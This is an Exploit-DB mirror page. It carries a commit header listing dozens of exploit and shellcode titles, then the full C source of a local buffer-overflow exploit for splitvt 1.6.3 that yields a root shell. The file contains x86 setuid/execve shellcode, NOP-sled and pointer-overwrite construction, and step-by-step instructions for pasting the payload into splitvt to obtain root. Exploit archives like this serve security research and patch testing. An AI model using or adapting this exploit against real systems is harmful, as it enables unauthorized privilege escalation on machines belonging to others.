exploit-db-mirror/exploits/linux/local/20013.c
Offensive Security 880bbe402e DB: 2019-03-08
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

119 lines
No EOL
3.4 KiB
C

// source: https://www.securityfocus.com/bid/1346/info
A buffer overflow condition that could be exploited to obtain root exists in splitvt 1.6.3 and earlier. Splitvt is distributed with several Linux distributions.
/*
Local exploit for Debian splitvt 1.6.3-4 - by Syzop
Thanks to aleph1 for writing the article about
buffer overflows in phrack 49 :).
Greetz: Terror, Scorpion, ^Stealth^, Jornx, Multani,
and all other ppl of The^Alliance :)
How to use the exploit
-----------------------
1. Use: ./splitexp >expcode to put the exploitcode into 'expcode'.
2. Start splitvt
3. Enter something like 'sleep 60; echo lalala'
4. Ctrl+O, x, 'Enter password' bla
5. Then splitvt says 'Re-enter password', this is the moment
you have to follow the instructions in 'expcode' to paste
the exploitcode to splitvt (don't press enter, see 6).
6. Wait until the sleep is done (or kill 'sleep' yourself from
_another_ terminal).
7. You now got a rootshell,
type 'reset' to get a normal terminal :).
IMPORTANT NOTES!!
------------------
NOTE 1: You have to paste the data exactly, so just a paste with the mouse
won't work since the shellcode also contains 08's (backspaces),
So using mouse copy&paste in normal linux console mode doesn't work,
I used windows with 'putty'
NOTE 2: If you ftp the exploit code to a windows box, be sure to transfer
the file in ASCII mode :).
*/
#include <stdlib.h>
#include <stdio.h>
#define NOP 0x90
/*
The shellcode: setuid(0); execve("/bin/sh",NULL); exit(0);.
Pointer to /bin/sh is static, so filled with 0x90s here,
will be changed to an address at runtime.
*/
char shellcode[] =
"\x31\xc0\x50\x89\xc3\xb0\x17\xcd"
"\x80\xbe\x90\x90\x90\x90\x89\x76"
"\x08\x31\xc0\x88\x46\x07\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
"\x8d\x56\x0c\xcd\x80\x31\xdb\x89"
"\xd8\x40\xcd\x80/bin/sh.";
void main(int argc, char *argv[]) {
char *buff, *ptr;
char *pointerz;
long *addr_ptr, addr;
int i;
long addr1=0x80592e4; // pointer to the middle of our window-struct
long addr2; // pointer to position after 25% of the NOPs
long addr3; // pointer to '/bin/sh' string
fprintf(stderr,"Splitvt exploit by Syzop\n\n");
if (argc > 1) addr1 = atol(argv[1]);
addr2=addr1+350;
addr3=addr1+444;
if (!(buff = malloc(1500))) {
printf("Can't allocate memory.\n");
exit(0);
}
// set offset-to-/bin/sh in shellcode
ptr = shellcode+10;
addr_ptr = (long *) ptr;
*(addr_ptr++) = addr3;
// 0-300: the window struct
// first filling with 0x40's
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < 300; i+=4)
*(addr_ptr++) = 0x40404040;
// set pointer to addr2 in curwin->process_char
ptr = buff + 28;
addr_ptr = (long *) ptr;
*(addr_ptr++) = addr2; // this is the pointer to addr2
for (i = 300; i < 528; i++) // 300-END NOPs
buff[i] = NOP;
// 400-...: shellcode
ptr = buff + 400;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[528] = '\0';
// Create the pointers-to-addr1-string.
pointerz=(char *)malloc(1004);
ptr = pointerz;
addr_ptr = (long *) ptr;
for (i = 0; i < 1000; i+=4) // 0-300: the window-structure
*(addr_ptr++) = addr1;
pointerz[1000]=0;
printf("Paste this 1x:\n%s\n\nAnd this 12x:\n%s\n", buff, pointerz);
}